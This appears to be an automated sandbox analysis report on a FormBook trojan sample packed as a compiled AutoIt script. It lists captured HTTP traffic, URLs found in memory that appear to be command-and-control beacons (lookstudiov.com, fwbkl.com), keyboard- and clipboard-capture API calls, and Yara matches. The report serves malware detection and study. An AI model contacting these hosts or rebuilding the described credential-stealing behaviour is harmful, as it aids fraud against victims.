2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 10:09:40 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 2Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Jul 2024 10:09:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Jul 2024 10:09:49 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Jul 2024 10:09:52 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Jul 2024 10:09:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005816000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000038D6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2542910321.00000000330F6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://lookstudiov.com/d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKA
Source: ljryBmFNsYlm.exe, 00000006.00000002.4473303315.000000000581C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fwbkl.com
Source: ljryBmFNsYlm.exe, 00000006.00000002.4473303315.000000000581C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fwbkl.com/d5fo/
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.00000000067CA000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000488A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.00000000067CA000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.000000000488A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Exo
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000006314000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000043D4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000006638000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4474271671.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000046F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: DevicePairingWizard.exe, 00000004.00000002.4470197861.0000000002E6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: DevicePairingWizard.exe, 00000004.00000003.2436100961.0000000007CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/css/parking2.css
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://plus.google.com/u/0/102310483732773374239
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&utm_medium=link&utm_camp
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/piensasolutions
Source: DevicePairingWizard.exe, 00000004.00000002.4474402610.0000000007CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000006638000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 00000004.00000002.4474271671.00000000079B0000.00000004.00000800.00020000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000046F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=bieniastest.xyz
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&utm_medium=link&utm_campa
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=we
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&utm_medium=link&utm_campaign=dom
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&utm_medium=link&utm_campaign=host
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&utm_medium=link&utm_campaign=correo
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&utm_medium=link&utm_campaign
Source: DevicePairingWizard.exe, 00000004.00000002.4472629196.0000000005B3A000.00000004.10000000.00040000.00000000.sdmp, ljryBmFNsYlm.exe, 00000006.00000002.4471489366.0000000003BFA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.piensasolutions.com?utm_source=parking&utm_medium=link&utm_campaign=piensa
Source: ljryBmFNsYlm.exe, 00000006.00000002.4471489366.00000000046F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E9425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00E9425A

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E94458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00E94458

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

0_2_00E9425A

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00E80219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00E80219

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe

Code function: 0_2_00EACDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00EACDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4471233765.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4469977289.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2202307920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4473303315.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2204228990.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4471294654.0000000004A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4471197321.00000000057B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2204277734.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_466.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00E23B4C
Source: LisectAVT_2403002B_466.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: LisectAVT_2403002B_466.exe, 00000000.00000000.2011707975.0000000000ED5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_68b700fc-8
Source: LisectAVT_2403002B_466.exe, 00000000.00000000.2011707975.0000000000ED5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_302dfb92-0
Source: LisectAVT_2403002B_466.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d6616437-b
